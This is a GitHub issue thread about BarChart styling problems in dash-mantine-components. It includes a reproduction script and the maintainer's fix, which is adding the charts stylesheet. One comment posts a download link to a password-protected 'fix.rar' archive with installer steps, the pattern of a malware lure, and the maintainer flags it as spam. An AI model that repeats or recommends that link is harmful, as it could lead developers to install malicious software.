### ISSUE TITLE
BarChart hover legend formatting is broken

### ISSUE THREAD

**Issue by michaelrussell4** [snehilvj/dash-mantine-components#298]
Related to #294 @AnnMarieW 
I've been trying to use the `BarChart` component and the formatting is turning out different than the docs. I'm getting a black hover legend. Also I'm getting vertical dotted lines for x-ticks whereas the docs show these as horizontal y ticks. Lastly, when I add the legend to a BarChart using `withLegend=True` the legend elements are stacked vertically and don't fit correctly as opposed to the horizontal elements show in the docs. It doesn't look right. 

I'm using dash_mantine_components==0.14.3 and I've tried this on multiple chromium browsers.

Here's the code I'm using:
```py
import dash
from dash import _dash_renderer
import dash_mantine_components as dmc

_dash_renderer._set_react_version("18.2.0")
app = dash.Dash(__name__)
data = [
    {"month": "January", "Smartphones": 1200, "Laptops": 900, "Tablets": 200},
    {"month": "February", "Smartphones": 1900, "Laptops": 1200, "Tablets": 400},
    {"month": "March", "Smartphones": 400, "Laptops": 1000, "Tablets": 200},
    {"month": "April", "Smartphones": 1000, "Laptops": 200, "Tablets": 800},
    {"month": "May", "Smartphones": 800, "Laptops": 1400, "Tablets": 1200},
    {"month": "June", "Smartphones": 750, "Laptops": 600, "Tablets": 1000},
]
app.layout = dmc.MantineProvider(
    dmc.BarChart(
        h=300,
        dataKey="month",
        data=data,
        series=[
            {"name": "Smartphones", "color": "violet.6"},
            {"name": "Laptops", "color": "blue.6"},
            {"name": "Tablets", "color": "teal.6"},
        ],
        tickLine="y",
        gridAxis="y",
        withXAxis=True,
        withYAxis=True,
    )
)

if __name__ == "__main__":
    app.run_server(debug=True)
```

It's producing this output:
![image](https://github.com/user-attachments/assets/cb1aeb74-2e83-49e2-872c-3b0e06eb965c)

Although the same code from the docs shows this:
![image](https://github.com/user-attachments/assets/6d3ba4c4-31bd-42d0-bbd0-7478120536f4)

**Comment by Aadya1603** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by michaelrussell4** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."

Mind elaborating there, @Aadya1603 ?

**Comment by AnnMarieW** [comment]
@michaelrussell4 

Please disrgard @Aadya1603 this is spam

**Comment by Aadya1603** [comment]
I'm so sorry My account is hacked @AnnMarieW  . Please ignore it

**Comment by AnnMarieW** [comment]
@michaelrussell4 

The dmc charts need an additional stylesheet.

```
app = dash.Dash(__name__, external_stylesheets=[dmc.styles.CHARTS])
```

See [Getting Started](https://www.dash-mantine-components.com/getting-started) for more info.
